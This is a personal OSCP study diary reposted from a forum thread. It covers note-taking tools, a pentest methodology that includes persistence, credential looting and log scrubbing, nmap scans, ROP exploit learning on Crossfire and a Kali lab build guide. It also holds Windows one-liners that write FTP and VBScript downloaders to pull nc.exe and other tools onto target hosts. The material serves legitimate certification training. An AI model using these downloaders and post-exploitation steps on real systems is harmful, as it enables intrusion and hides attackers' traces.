OSCP - JollyFrogs' tale

2017, Dec 02    

OSCP - JollyFrogs’ tale

original post

I’ll be starting my OSCP journey soon; that is to say: I have already started preparations for the journey but have not signed up to the course yet. I am spending a lot of time sharpening my axe in anticipation of the OSCP tree that yearns to be felled. I have done away with modesty and challenged myself with the goal to subvert 100% of the lab machines and get a 100% marking score on my exam, first try. I am very lucky to have a very understanding second half who fully supports my endeavor. 600 hours of self-study and lab time have been set aside for this great adventure.

My basic plan is as follows:

  • Read as many forums and blogs as I can - This task is complete
  • Utilize the resources from those forums and blogs to prepare - This is where I am now
  • After preparing, I will sign up for the OSCP study and maximize my lab time

I will dedicate 2-3 hours per day plus 8-10 in the weekends to studies. I’ll sign up for 3 months lab and should be able to put in more or less 360 hours of lab time if I prepare well. Seeing there are about 60 machines in the lab, that’s an average of 6 hours per machine owned. I never expected this to be easy

My preparation tasks are proceeding well. I will detail more about my preparations in days to come.

I got introduced to the OSCP certification during an interview where the interviewer asked me if I had the OSCP credential. After the interview I immediately looked up OSCP on google and found a wealth of information in forums and blog entries about the course. After reading many posts and blogs, I decided that I wanted (read “wanted” and not “needed”) to do the OSCP, so I started doing lots of research into OSCP and the materials. I learnt that the primary required attribute of any pentest is the preparation and enumeration phase. I learnt about how hard the labs were, and that some machines like Sufference, Pain and Gh0st were amongst the hardest, toughest nuts to crack. This appealed to me and I set myself a challenge: To hack each and every machine in the labs, and to pass my exam with a 100% score. There are around 60 lab machines and many people struggle in the labs, so this is going to be quite the achievement. I would have to maximize my time in the labs as much as possible if I wanted a chance at hacking (aka “owning” or “pwning”) each and every machine that was presented to me.

After reading many forums, blogs, tweets, and any other information I could get my hands on, I realised that I would have to prepare thoroughly if I wanted to maximise my time in the labs. I’ve read about some people taking 4 weeks just to get through the course materials, then another 4 weeks to get everything in order before they can access the labs. I was not going to let that happen to me, I wanted to start tackling the labs from the get go. I asked my partner if she was ok with me disappearing into virtual labs every night and every weekend for the next 3 months, she is very supportive.

One of the most important aspects of my preparations would be to decide what note-keeping software I was going to use. OSCP recommends a program called “KeepNote”, but me being me, I decided to make up my own mind. So I spent two full days trying various notekeeping softwares. I tried CherryTree, KeepNote, EverNote, OneNote, NoteCase, Zim, KeyNote, and many more. I had certain requirements for what a good note-keeping tool would have to do if I wanted to maximise my time in the labs:

  • Hierarchical (tree with sub branches and “leaves” aka pages)
  • Easy screen Clipping feature (press a shortcut and the program inserts a screenshot for you in your notes)
  • NOT in the cloud (I prefer not to put personally identifiable items in the cloud)
  • Export into .PDF or .DOC format so I didn’t have to rewrite my report after taking the notes

CherryTree, KeepNote and OneNote were my preferred tools. I really liked OneNote with one exception: The free version of OneNote forces you to save everything into the cloud, unencrypted. CherryTree looked good, plenty of addons and plugins and it could do what I wanted although simple things like setting up screen clipping were very clumsy. I eventually settled on KeepNote, due to its simple layout and integrated screenshot functionality. The only downside of KeepNote is that it can’t save its output in .PDF format. But when I thought about that requirement a bit more, it didn’t make sense to just compile my notes in a .PDF and send that off to the OffSec guys: Plenty of items in my notebook would be for personal use only or not relevant to the exam. Many screenshots I might not need or want in the report so I would probably have to compile a separate report anyway, which I have decided to do in Word, using the information and screenshots in KeepNote.

I’ve started using KeepNote now and I’m very satisfied with the decision to use KeepNote, having tried many other tools. I’m writing this note in KeepNote!

Tips on using KeepNote:

  • Take a screenshot by pressing CTRL-INSERT.
  • Run KeepNote off an SSD hard drive otherwise it can be sluggish.
  • If possible, don’t attach files into KeepNote or it might corrupt your notes. Try to keep sploits/files in a separate directory on your PC.
  • Spend a few hours setting up your folder structure.
  • Make frequent backups. I backup my KeepNote notebook every 3-4 hours.

Another week has passed, and I’m having a blast with the OSCP preparations so far. I haven’t even registered for the course yet, as I am still sharpening my axe. I’ve started thinking about a calculated approach for pen-testing. I felt the generic approach was a bit vague, so I have come up with a much more detailed approach. I intend to script as many of the steps as possible, I’ve started scripting 1) and 3)

The system I came up with (which I will probably tune once I get started in the labs) is as follows:

  1. Recon scripts: Automated recon of a network. This will give us a generic idea of what kind of machines are on the network and the various OS’s and possible “sweet spots” to start the exploitation process. Only the top 10-20 ports are scanned but we’re scanning the whole /24 range.
  2. Mapping scripts: Mapping is where I aggregate the data gathered from the recon scripts and start to make sense of things. This includes relationships between systems and traffic flows. This is a manual step which will be done in Visio manually. I have built a Visio template diagram which I will use for this purpose. Mapping will be a continuous process as I move forward in the lab and the Visio diagram will be updated on an almost daily basis.
  3. Remote enumeration scripts: These are scripts which will scan a single system remotely, mostly enumerating ports and shares but also the information FROM those ports. This is where the full 1-65535 ports will be scanned (both TCP and UDP) and where each port is fingerprinted, SMB shares are enumerated, user IDs, SNMP details, FTP banners, OS versions etc
  4. Remote Exploits & Privilege Escalation: Here we move from knocking on the door to bashing the door out of its sockets and force entry in to the remote system. This includes remote “point-and-shoot-instant-system-access”, FTP brute-force, HTTP directory brute force, SNMP brute force, active exploits against open services, etc
  5. Local Enumeration scripts: Once we have entered the machine remotely, we enumerate again, getting as much information from the system as possible. This includes interesting files, bash history, cmd history, environment settings, memory, running services, directory permissions, service permissions, scheduled jobs, weak permissions etc
  6. Local Exploits & Privilege escalation: We might have a low level user, or a restricted administrator account, this is where we escalate to full root/system level access. This includes UAC bypass, elevation scripts, local exploits, brute forcing, etc
  7. Persistance: This is where we install backdoors to secure our access. We don’t want to have to go through the whole steps above again. Things like adding local administrator accounts, setting service to start automatic on boot, putting a pinhole in the firewall service, etc
  8. Root Loot scripts: This is where we search the whole system with system/root access for interesting data. This includes stealing hashes from LSA, configuration scripts, SAM/shadow database, cracking MD5 and NTLM, checking currently connected users, checking relationship between this host and other hosts, etc
  9. Cleanup: This is where we scrub logfiles, clean exploits, hide backdoors, essentially we “wipe our fingerprints” from the system
  10. Update maps and diagrams, and move to another system on point 3)

[Quote] Originally Posted by Mitechniq ![View Post]

I believe I am missing something here, why are you going through the effort of building out your own scripts when Kali has all the modules and tools to Pen-Test. Since you will be using Kali for the labs and the exams, wouldn’t it just be better to download Kali and familiarize yourself with it.

I don’t believe that using a powerful tool such as Metasploit will teach the level of fundamentals that I am seeking.

I learned about fuzzing, assembly language, endian systems, memory and debuggers. The easy path would have been to use a readily available fuzzing tool, or a proof of concept code and modify the shell code to open a shell to a slightly different IP address.

I chose the hard way and wrote a Python script (I had never seen a Python script until 2 weeks ago) to fuzz the application, based on another exploit I had written for a more basic application. The result of coding the fuzzer myself is that I know what each and every line of code does and why it is there. In the process of exploiting VulnServer.exe I created a generic process for writing exploits.

I seek not just to admire the magic, but to understand and master it.

[Quote] Originally Posted by MrAgent ![View Post]

Just a word of advice. If you’re going to script out scanning, make sure you have something in place to scan even if ICMP is not enabled on the target.

Agreed, I was anticipating firewalls blocking ICMP. These are the commands I decided on using:

  1. Start with a recon scan of the network to get an idea of the network:
nmap -Pn -F -sSU -T5 -oX /root/ | grep -v 'filtered|closed' > /root/quick_recon.txt
  1. Then force-scan all ports UDP + TCP per host (takes about 4 minutes per host on a LAN or roughly 17 hours for 254 hosts):
nmap -Pn -sSU -T4 -p1-65535 -oX /root/ | grep -v 'filtered|closed'
  1. Then run an intensive scan on the open ports per host, TCP and UDP separately to speed scan up:
# tcp:
nmap -nvv -Pn -sSV -T1 -p$(cat | grep portid | grep protocol=\\"tcp\\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/

# udp:
nmap -nvv -Pn -sUV -T1 -p$(cat | grep portid | grep protocol=\\"udp\\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/

Note: During the lab time, I intend to reset the host before doing a full port scan. I will reset each host before I attack it to ensure that there are no spoilers or backdoors on the host.

I learnt about ROP chains yesterday. Very interesting stuff. How did I get into ROP chains, and what are they? Ohhh good question, let’s go back in time! Keep in mind, I haven’t yet started the course, this is all part of my preparations to maximize lab time

In the OSCP Syllabus (available here: https://www.offensive-security.com/d…-with-kali.pdf) a “Crossfire” application is mentioned. I went to exploit-db.com and saw that crossfire 1.9.0 is vulnerable to a buffer overflow (https://www.exploit-db.com/exploits/1582/). The code is in c and is overly complex for my needs (dynamic shellcodes etc). The code abuses an overflow in the “setup sound” module and I had to fuzz the application with various codes until I found the exploit code I needed and the server crashed. I am running the Crossfire application on my Kali machine and use the evans debugger which comes as part of the Kali distribution. After crashing the server, finding the bad characters and being able to overwrite the EIP, I sent my reverse shell in anticipation of a prompt… and nothing happened!

In EDB I saw a segmentation fault. This was new. I put a breakpoint on the JMP ESP trampoline I had set up to jump to my shell code, and reran the exploit. EDB breaked out at my JMP ESP trampoline, I pressed F8 to step one instruction further and surely I was in my jump code which was about to jump to my shell code. When I pressed F8 on the first instruction in my jump code I got a segmentation fault. This was new and unexpected! Why would the program segment fault on a perfectly good instruction? I started googling “Linux memory segmentation fault” which gave too many results, I then searched “linux segmentation fault exploit” and found c - Exploiting buffer overflow leads to segfault - Information Security Stack Exchange which hints toward a feature called ASLR and “-z execstack”. Further research indicates that these are two memory protection mechanisms: ASLR randomizes the memory address space and the -z execstack relates to a feature called execshield (aka “NX bit”, aka “DX”, aka Execute Disable, aka DEP, aka many other names). I checked on my Kali machine whether this might be the culprit with the following command dmesg | grep --color '[NX|DX]*protection' and indeed, NX was enabled. Further investigation into the possibility to disable NX bit (including via my virtualbox option “Enable PAE/NX” would just result in Kali emulating NX and not really solve my problem in the first place: If this was a remote host, would I be able to disable NX via its host system or via kernel options? The answer is most likely no, unless I had some kind of root/system/god-mode access to the network in which case the exercise would not be required.

DEP/NX works very simply: If memory is R/W, then it can’t be X. If memory is R/X, then it can’t be W. So if we can WRITE to the memory (stack) then we can’t EXECUTE it. (hence the segmentation fault). It we can EXECUTE it, we can’t WRITE to it.

So I started looking into the option to exploit this “NX bit” and whether I could program around it: Enter ROP! ROP stands for Return Oriented Programming. Where normal programs use the EIP address to point to the next instruction, ROP uses the ESP address to point to the next instruction. How can this be? Well, it turns out that any “RET” instruction in programs look up the original source address which they get from the ESP, not the EIP. So while normally we’d try to control the flow of a program with EIP, with ROP we try and control the flow of the program with ESP. Let me explain:

Normal execution: MOV EAX,1 -> EIP increased by one which points to the next instruction -> MOV EBX,1 -> EIP increased by one which points to the next instruction etc ROP execution: ESP points to RET -> return address taken from ESP stack -> ESP points to another RET -> EIP never gets a chance to play

So what good is it to execute RET instructions the whole time? Well not much. But here comes the genius: If we can find OTHER instructions just before the RET instructions, we can have the system execute those instructions, the RET will be next which we control because we control the ESP stack. We can’t WRITE the instructions we’re using, but we can EXECUTE them (and as such, DEP allows us to execute).

And that’s where I am now, do I install a vulnerable operating system without NX support and simply follow the exercises, or do I write a ROP exploit for Crossfire 1.9.0? The ROP exploit is tempting but will be time-consuming, it could take me a week to finish a ROP exploit, which I could spend on finishing my preparations. I’ll keep you posted!

[Quote] Originally Posted by wes allen ![View Post]

You should read up on EMET, and how to bypass it, if you are interested learning more about modern memory protections.

Hi Wes,

Thanks. The current exploit I’m writing runs on Linux and EMET seems to use similar techniques to the Linux memory protections. I’ve decided to go the hard way and write a ROP exploit for Crossfire 1.9.0 running on Kali 1.1.0a. I will read up on EMET after I get success - which could take considerable effort and time.

Ok, so after spending two full days programming ROP chains, I finally created a working ROP chain which works on the Kali PAE image. I now realize that I have been working with the wrong image from the very start.

So here is a tip:

When downloading the Kali image from the offensive security site (https://www.offensive-security.com/k…mage-download/) make sure you choose the image called “Kali 32 bit VM” and not the image called “Kali 32 bit PAE VM” like I did haha, I learnt today that sometimes, more is not better

I did learn a lot by using the PAE image:

  • Built a working ROP chain
  • Use gbd and edb debuggers more proficiently
  • Write scripts more efficiently
  • Found lots of interesting websites in the process
  • Got better at python scripting
  • Learnt some really cool assembly tricks
  • Learnt to decompile shellcode to assembly code to analyze what it does
  • Learnt to write my own shellcode in assembly, compile it and run it!
  • including my own first assembly reverse shell

But, I must keep on track, it’s time to move on to web application vulnerabilities and SQL injection, woop woop!

JollyFrogs, Brisbane Australia Version: 0.1 Revision date: 26 May 2015

My OSCP build guide

Welcome message

This is my OSCP build guide, the goal of this guide is to help set up a Linux Kali machine on VirtualBox for OSCP studying.

Note: This guide is written for Windows 7 64-bit Host OS, I strongly advise using this operating system to install your OSCP machines.

This is the hardware that I used to set up this lab, if you don’t have similar or better hardware, I advise investing a little in getting good hardware:

  • Asus Maximus Hero VI motherboard
  • 32GB memory (Kingston)
  • Intel 120GB SSD
  • Core i7-4770K CPU @ 3.50GHz, 4 Core(s), 8 Logical Processors
  • Windows 7 64-bit (6.1.7601 SP1)

I have created this lab using my own network IP addressing, details of which are: (All subnet masks in the LAN are /24 aka

The following components are what I start with, just my PC and a router which I used as default gateway to connect to the internet: = My physical internet router (a Ubiquity ERLite3) which acts as my default gateway and DNS server. = My main PC LAN interface, we will lose this IP when we configure a BRIDGE interface later

The following IP addresses are used for various components that are added during this guide: = My main PC BRIDGE interface = Kali 1.1.0a VirtualBox VM

You have two options when following this guide:

  1. Rename all references to the IP addresses above and in this guide to IP addresses you are using on your LAN. Or
  2. Renumber your internal network IP addressing to use the same IP addresses as in this guide.

You do not need hardware components to set up this lab other than a beefy PC, everything is virtualized in your PC.


Note: The fun part begins in the section called “After Reboot”, but don’t skim over these first steps; they are the foundation of your environment. Any mistake here will affect your environment later in unpredictable ways, please take the time to go through these steps carefully. Spelling matters, typos matter. If you run into any issues during installation, please re-read the instructions carefully and ensure you haven’t made a typo.

IMPORTANT NOTE: I don’t isolate hosts on my network. This is a very UNSAFE practice, especially when meddling with vulnerable applications and systems while coding and testing new exploits. I run a simple but good firewall (Ubiquity ERLite3) which protects my network from outside attacks, but more importantly, I have off-line backups of all my important files and documents. If this is something that you don’t feel 100% comfortable with, then you should set up an isolated network which is totally segregated from your home network. VirtualBox supports this kind of set up via “Host-only adapters”.

Get required files:

**NOTE: Forget about this post there is a new update in the end check Version 1.08 JollyFrogs OSCP PWK Kali 2.0 installation guide v108 - Pastebin.com **

VirtualBox 4.3.26 R98988: http://dlc-cdn.sun.com/virtualbox/4….-98988-Win.exe

Kali 1.1.0a (kali-linux-1.1.0a-i486.iso): http://images.offensive-security.com/kali-linux-1.1.0a-vm-486.7z

NOTE: For the OSCP exam, you’ll need the 32-bit Kali, NOT the 64-bit as people have reported issues with 64-bit.

NOTE: Don’t get the “PAE” version of Kali linux! We’ll be running buffer overflows on your Kali and PAE will make the exercise needlessly hard

Create and bridge a loop-back adapter so your virtual machines can talk to your physical PC and network

  • Click the Windows Start button (bottom left)
  • type “cmd” but do not press enter
  • Right-click “cmd.exe” (top of start bar menu) and select “run as Administrator” (Click “Yes” to confirm)

Note: In the black cmd.exe screen:

  • type “hdwwiz.exe” and press Enter

Note: the “Add Hardware Wizard” window opens

  • Click “Next”
  • Select “Install the hardware that I manually select from a list (Advanced)” and click “Next”
  • Select “Network adapters” and click “Next”
  • Select “Microsoft” and “Microsoft Loopback Adapter” under Manufacturer and Network Adapter respectively, then click “Next”
  • Click “Next” to install the loopback adapter
  • Click “Finish” to close the “Add Hardware” screen

Note: We’re still in the black cmd.exe screen:

  • type “ncpa.cpl” and press Enter

Note: the “Network Connections” window opens

  • Right-click the adapter “Microsoft Loopback Adapter” and select “Rename”
  • Rename the Loopback Adapter to “LOOPBACK” to remove confusion later
  • Right-click your wired network adapter and select “Rename”
  • Rename your wired network adapter to “LAN”
  • Highlight (left click while holding CTRL key pressed) both the LOOPBACK adapter and your LAN network adapter
  • Right click on the LOOPBACK while both adapters are highlighted and select “Bridge Connections”

Note: This will create a new network card called “Network Bridge”

  • Right-click your new bridge adapter and select “Rename”
  • Rename your wired network adapter to “BRIDGE”
  • Right-click “BRIDGE” and select “Properties”

In the “BRIDGE Properties” screen:

  • Left-click (this highlights) “Internet Protocol Version 4 (TCP/IPv4)” and click “Properties”

In the “Internet Protocol Version 4 (TCP/IPv4) Properties” screen: In the “General” tab at the top: Select “Use the following IP address” IP address: Subnet mask: Default gateway: Preferred DNS server: Alternate DNS server:

  • Click “OK” to close the “Internet Protocol Version 4 (TCP/IPv4) Properties” screen
  • Click “Close” to close the “BRIDGE Properties” screen

Note: We’re still in the black cmd.exe screen:

  • type “ping www.google.com”

Note: You should see replies from the google web server. Your BRIDGE adapter is now your main network adapter Note: Do not proceed if you do not have internet connectivity

  • Close the “Command Prompt” black cmd.exe screen

Install VirtualBox

Run “C:\GNS3\INSTALLERS\VirtualBox-4.3.26-98988-Win.exe”

Note: Click “Yes” on any opening warnings

  • Click “Next”
  • Click “Next” (install all options)
  • Click “Next”
  • Click “Yes”
  • Click “Install” to start the installation
  • Click “Yes” at the UAC warning screen
  • Click “Install” to install the device driver
  • Click “Finish”

Install Kali 1.1.0a on VirtualBox 4.3.26 R98988

Unzip the file kali-linux-1.1.0a-vm-486.7z to E:\VIRTUALBOX_DISKS\kali\

Start “Oracle VM VirtualBox”

  • Click “New”

Name: Kali110a-32bit-NOPAE Type: Linux Version: Debian (32 bit)

  • Click “Next”

MB: 1024

  • Click “Next”

Select “Use an existing virtual hard drive file”

  • Click the little yellow folder with the green arrow

Choose: “E:\VIRTUALBOX_DISKS\kali\Kali-Linux-1.1.0-vm-486.vmdk”

  • Click “Create”

NOTE: A new icon “Kali110a-32bit-NOPAE” was created in your “Oracle VM VirtualBox Manager”

NOTE: Leave settings at default unless otherwise stated below

NOTE: I’m showing some important settings even though they are defaults, in case the defaults change some day

  • Right-click “Kali110a-32bit-NOPAE” in the left menu and click “Settings…”

General - Advanced - Shared Clipboard: “Bidirectional”

System - Motherboard - Floppy: Untick

System - Processor - Enable PAE/NX: Make sure this is NOT ticked

Audio - Enable Audio: Untick

Network - Adapter 1 - Enable Network Adapter: Tick

Network - Adapter 1 - Attached to: “Bridged Adapter”

Network - Adapter 1 - Name: “MAC Bridge Miniport”

Network - Adapter 1 - Advanced - Adapter Type: “Intel PRO/1000 MT Desktop (82540EM)”

Network - Adapter 1 - Advanced - Promiscuous Mode: Allow All

Network - Adapter 1 - Advanced - MAC Address: 444444444444

NOTE: Set the MAC address to an easily identifiable MAC

Network - Adapter 1 - Advanced - Cable Connected: Tick

  • Click “OK” to close the “Kali110a-32bit-NOPAE - Settings” screen
  • Right-click “Kali110a-32bit-NOPAE” in the left menu and click “Start”

Note: A new screen “Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox” opens and the Kali Linux installer will boot.

In the “Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox” screen:

Your new Kali installation will boot, let it time out for 5s in the GRUB menu

You will be presented with the Kali login screen

Click anywhere in the screen with your mouse

Note: To unlock the mouse from Virtualbox, press the rightmost CTRL key on your keyboard

  • Click on “Other…”
  • Username: root
  • Password: toor

Note: You will be presented a desktop environment.

Note: Do NOT update Kali linux, we’ll make a backup first so you can go back to a clean Kali installation

In the top of the screen, click the black >_ icon (“terminal”)

In the “[email protected]:~” terminal window type (omit “[email protected]:~# “):

[email protected]:~# ifconfig

Note: You should see eth0 has an IP address

[email protected]:~# ping

Note: You should see replies from

Press the right-most CTRL key on your keyboard to unlock the mouse

In the top menu bar of the “Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox” screen:

  • Click “Devices” -> “Insert Guest Additions CD Image…”
  • Click “Cancel” in your Kali desktop popup to dismiss the autorun popup

In the top of the screen, click the black >_ icon (“terminal”)

In the “[email protected]:~” terminal window type (omit “[email protected]:~# “):

[email protected]:~# cp /media/cdrom/VBoxLinuxAdditions.run . [email protected]:~# ./VBoxLinuxAdditions.run Note: VirtualBox Linux Guest additions will now install [email protected]:~# reboot

Note: After rebooting you will notice that your mouse magically enters and exits the VM. This is because of the VirtualBox Additions!

  • Press on "Other..."

Username: root Password: kali

  • Right-click “VBOXADDITIONS_4.3.18_96516” and click “Eject” near the bottom

Note: Now that you have installed the VirtualBox additions to Kali, you can:

  • Seamlessly move the mouse in and out of the virtual machine
  • Copy/Paste to and from the virtual machine using clipboard
  • Share folders between the virtual machine guest and your host machine

In the top of the screen, click the black >_ icon (“terminal”)

In the “[email protected]:~” terminal window type (omit “[email protected]:~# “):

[email protected]:~# shutdown -h now

Note: Now that we have a good clean install of Linux Kali, we’ll back it up so you can restore a clean install in minutes if required

In the “Oracle VM VirtualBox Manager” window:

  • Click “File” -> “Export Appliance…”
  • Left-click “Kali110a-32bit-NOPAE” to highlight it
  • Click “Next >”


Format: “OVF 1.0” Write Manifest file: Tick

  • Click “Next >”
  • Click “Export”

Note: The export can take quite a while

Note: After the export finishes, we have completed the installation of Kali in your network!

I’ve focused on the Windows platform in recent days. I managed to grab my notebook and took notes while falling down the rabbit hole. I’ve counted 493 pages in my notebook so far, of which about half is scripts and text.

Over the last few days I’ve learnt/done:

  • Default Windows UAC settings are easy to bypass as long as the setting is not set to “Always prompt me when programs try to run with elevated privileges”. By default, Windows 7 has this setting disabled. I’ve coded several pieces of code that allow me to run my own programs without being prompted by UAC. I’m not sure if I will need this functionality in the labs, but if I do, it will save me some research and compilation.
  • A properly built and secured Windows machine is not trivial to exploit.
  • I’ve been building a list of “interesting files” as part of my ever growing “loot list”. I’ll be enumerating 3 times per host: The first time is during remote enumeration, the second time I will enumerate as a low privilege user, the third time I will enumerate as the system/root account. Literally “Enumerate, Enumerate and Enumerate some more”. The enumeration scripts for the local user and root user are very similar: After all, I don’t know which files I will have access to under either account so I have to run all checks in my loot list, without prejudice. Would I expect a admin to give world readable permissions to the shadow file? No, but someone else might! For instance, a badly configured machine might allow access to the SAM database as a low privileged user, so any loot that would be interesting to run under the root account would be equally (if not more) interesting under the low privilege account. Similarly, some files might be hidden to my low privilege user which will only be reachable under the system/root account.
  • I worked on my windows one-liner command skills, learnt a lot
  • I created a tool-set for downloading files to windows machines using various techniques for different platforms, using only default tools available on the target host. I would imagine that on most windows machines, tools like nc.exe won’t be available so this will provide me with an easy way to transfer the files without requiring additional tools on the windows machine.
  • I’ve learnt that a Philips HD9240 Airfryer makes delicious, crispy fries! (I bought one last week)

Over the last few weeks I’ve come to understand the importance of having a solid documenting methodology. I understand now just how easy it is to get lost in all the information out there. Spending a few days early on, perfecting my documentation system has been critical in keeping my gathered information categorized. I’m using the same major folder structure a per my post #6, and with almost 500 pages of documentation it’s still easy to find information.

I still have much to do before I can consider myself ready on the windows platform: Pre-compiling exploits, scripting, privilege escalation to name a few big ones. And that’s just the Windows side of things, after Windows there is Linux, databases, web-servers etc… I am starting to understand how people can get bogged down in their progress.

It’s Saturday and another week has flown by. I’ve had to burn the midnight oil at work and I haven’t been able to put in as much study time as I wanted. I did study every day though, just not the 3 hours I initially planned. I’ve modified my attack vector slightly, including public research in the passive recon step, and creating a new step for social engineering and client-side attacks. I still like the idea of having sub-folders with the various platforms so I’ve left that bit untouched. I started attaching my compiled exploits into my notebook, organized by platform. I haven’t had a crash yet but I ensure I keep saving the notebook every 5-10 minutes, with a full notebook backup every 2-3 hours and at the end of each day. I decided to zip the exploits before attaching them, which allows me to double-click on an entry in my KeepNote notebook which will open the contents of the zip file (the exploit) in my 7-zip explorer-like window. I wasn’t keen on double-clicking on executable exploits in KeepNote on my day-to-day desktop machine, even though I know they won’t harm my machine since I coded them. I only pre-compiled exploits with bind shells privilege escalation exploits, and I ensured that all my exploits have easily swappable shell-codes. I have kept the sources of my exploits with detailed guides on how to compile on Kali for when I need reverse shells. I have come up with a naming convention which allows me to quickly search through the ever growing list of exploits and source codes I’m hoarding. Every script and piece of code starts with a note on how to compile, how to use and how to modify.

Here are some of my Windows one-liners, these two methods can be used for any command that requires multiple lines, for instance when creating an FTP script or creating a visual basic script to download a file:

set r=^&echo:&&(echo open 21%r%ftp%r%bin%r%GET nc.exe%r%bye) > ftp.txt&&ftp -s:ftp.txt


(for %t in ("open 21" ftp bin "GET nc.exe" bye) do @echo %~t) >ftp.txt&&ftp -s:ftp.txt

Keep in mind that the Windows nc.exe tool has a limitation on the amount of data you can send per command. For instance, nc.exe will crash with the following one-liner because it is too long (it works in cmd.exe and other cli’s, just not via nc.exe):

(for %t in ("strUrl = WScript.Arguments.Item(0)" "StrFile = WScript.Arguments.Item(1)" "Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0" "Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0" "Const HTTPREQUEST_PROXYSETTING_DIRECT = 1" "Const HTTPREQUEST_PROXYSETTING_PROXY = 2" "Dim http,varByteArray,strData,strBuffer,lngCounter,fs, ts" "Err.Clear" "Set http = Nothing" "Set http = CreateObject("WinHttp.WinHttpRequest.5.1")" "If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")" "If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")" "If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")" "http.Open "GET",strURL,False" "http.Send" "varByteArray = http.ResponseBody" "Set http = Nothing" "Set fs = CreateObject("Scripting.FileSystemObject")" "Set ts = fs.CreateTextFile(StrFile,True)" "strData = """ "strBuffer = """ "For lngCounter = 0 to UBound(varByteArray)" "ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1)))" "Next" "ts.Close") do @echo %~t) >wget.vbs && cscript wget.vbs []( putty.exe

I signed up today! I enlisted with my work email, got an email on my work email with confirmation code, which I used to sign up. My account is being generated after which I will have to test out lab access. When this is confirmed, I will get the option to pay for the 90 days of labs and the exam. I’m really looking forward to starting the lab and I’m keen to see if my preparations will pay off. My goal is 100% of the lab machines owned.

I have completed my sign up for the Penetration Testing with Kali (the required course to sit the OSCP exam). The process is as follows:

  • Sign up via offensive-security.com website with a non-public email address
  • Get an email from them shortly after with a registration link
  • Use the link in the email to reserve a starting date for the labs
  • Receive an email shortly after (within a day or so) with VPN details to test the VPN connection for up to 48hrs and a payment link
  • After verifying the VPN connection works, pay for the course using the payment link (within 72 hours)
  • Wait until the starting day

So I received my VPN details to test the connection. I tested the connectivity and decided to run a quick nmap scan and to my surprise I was connected to the real lab… and I had 48 hours of play time! I wasn’t going to let that go to waste, although if I had to sign up again I probably would have signed up on a Thursday so I had the whole weekend to play. I have a full time job so I only had about 5 hours total in the labs, minus the time it took to set up the connection . So naturally, I decided to give it a go.

My scan revealed many boxes with a fair amount of open ports: This was going to be good! The OffSec people had specified in the email which host ranges to scan, and my IP address was in the 192.168.14.x range. They mentioned I should be able to ping the x.x.x.220 ip address of my range, depending on which of the lab ranges I ended up in (random). The range though, is a /23. I tried pinging and couldn’t ping it but when I tried I saw ping replies.

So out came nmap as per my methodology explained in my earlier post:

nmap -Pn -F -sSU -T5 -oX /root/ | grep -v 'filtered|closed' > /root/quick_recon.txt

This command took about 4 minutes to complete, and the open ports lit up like a Christmas tree. I didn’t really have any idea or preference of which host to attack first, and seeing so many open ports on so many machines, I figured the simplest approach would be to start at the lowest IP and work my way up through the IP addresses.

I started with the first IP address. After enumerating the host, I found a vulnerability I could exploit. I didn’t want to use Metasploit for this because I would learn more doing things by hand first. I didn’t start up my listener before I fired off my fumbled attempt to exploit and this resulted in a denial of service on the machine: I crashed it by accident and had no way to reset it. I didn’t have a GUI panel available to reset hosts since I was only supposed to be testing the VPN connection.

After this silly mistake I decided to change my attack methodology, mainly because I want to maximize my time in the labs and exploit every host: I will use Metasploit for mundane tasks like reverse shells, simple fire-and-forget exploits and uploading files through Meterpreter. After I complete the labs and if I still have time left, I will repeat the exploits by hand.

I then moved on to the next host which I expect will require some form of brute-forcing. I was looking for something a little more meaty than building a word-list and running a brute force tool against a server so I proceeded to the next IP in the list. My next target was called Bob, and I had a great time breaking into Bob. I went to bed 2 hours later than I had planned to, I just couldn’t get myself to go to bed knowing I could solve this puzzle. My persistence paid off, and after about 3 hours of puzzling and taking notes and screenshots, Bob was mine.. and it felt great! I looted the box, left behind the digital equivalent of graffiti (a “Jollyfrogs.txt” file with some words of wisdom) and logged off from the VPN, tired but extremely satisfied.

Being the first host I exploited to system/root level, it certainly will be a name I will remember. I didn’t have time to look at other hosts but Bob made me realize that my generic approach works which is a relief.

My exam starts Sunday the 21st of June (next week) and I’m excited to start!

[Quote] Originally Posted by MrAgent ![View Post]

Good thread so far. Keep it up! How much time did you sign up for?

Hi MrAgent, I signed up for 90 days.

[Quote] Originally Posted by the_Grinch ![View Post]

Awesome posts! Let me just commend you on all the work you have done prior to signing up. What’s your background?

[Quote] Originally Posted by JoJoCal19 ![View Post]

This thread is great! Thanks for all of the info JollyFrogs. Also like the_Grinch, I’d like to know what your background is. Also if it wouldn’t be too much trouble, can you list the sources, links, book names, you used to to learn these pre-sign up skills? It would be beneficial to myself and others looking at the OSCP.

Hi The_Grinch and JoJoCal19, I started using computers when I was 7 when my dad bought a Commodore 64 for the family. Although a family gift, none of my family members were interested in computers so I had plenty of time to get acquainted with BASIC and of course play the many games that I was trading with friends. There was no internet back in the days and most programs would be loaded from music cassettes (magnetic tape is still used today to store information for instance in DLT tapes). I remember tuning in to radio shows that broadcast code which you could record onto cassette and then load in the computer. We’re talking WarGames era here where internet connections still made beeping and screeching noises. Of course my parents never allowed me to use the phone line so I was limited to one-way traffic from the public radio stations to my dad’s Pioneer radio system.

